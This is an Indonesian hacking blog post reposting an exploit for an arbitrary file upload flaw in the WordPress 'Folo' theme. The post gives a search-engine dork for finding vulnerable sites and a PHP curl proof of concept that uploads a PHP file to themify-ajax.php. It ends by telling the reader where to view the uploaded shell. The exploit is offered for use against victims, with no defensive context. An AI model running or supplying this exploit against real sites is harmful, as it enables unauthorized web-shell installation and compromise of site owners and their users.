Select Menu

Ads

Random Posts

Black-Ink. Diberdayakan oleh Blogger.

Metasploit

Web Pentest

Circle Gallery

" });

Our Chanel

Tutorial

Tools

» » Wordpress Themes Folo Arbitrary File Upload Vulnerability

Posted by: Black-Ink Posted date: 02.20 / comment : 0 








Exploit Title : Wordpress Themes Folo Arbitrary File Upload Vulnerability


#Author : ReC0ded
#Vendor : http://themify.me/
#Download : http://themify.me/themes/folo
#Date : 22, November 2013.
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : File Upload
#Tested On : Windows 7 32-bit | Google Chrome

#Dork : inurl:/wp-content/themes/folo/ | USE YOUR BRAIN =))

#Exploit : http://victim/[PATH]/wp-content/themes/folo/themify/themify-ajax.php

#POC : 

<?php
$uploadfile="ReC0ded.php";
$ch = curl_init("http://victim/[PATH]/wp-content/themes/folo/themify/themify-ajax.php?upload=1");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

#Results See Your Shell On : http://victim/[PATH]/wp-content/themes/folo/uploads/{YOUR_FILE}.php


















Tagged with: 








About Black-Ink









WePress Theme is officially developed by Templatezy Team. We published High quality Blogger Templates with Awesome Design for blogspot lovers.The very first Blogger Templates Company where you will find Responsive Design  Templates.













 « 


Next
Posting Lebih Baru




 » 


Previous
Posting Lama














Tidak ada komentar
















 Leave a Reply


Biakan Jadi Pembaca Yang Tau berterima kasih  .... :D
Meski hanya dengan menulis kata Terima kasih ...




















        

      












Langganan:
Posting Komentar (Atom)






























Copyright © 2014 
Blogger Templates 
Designed By: Templatezy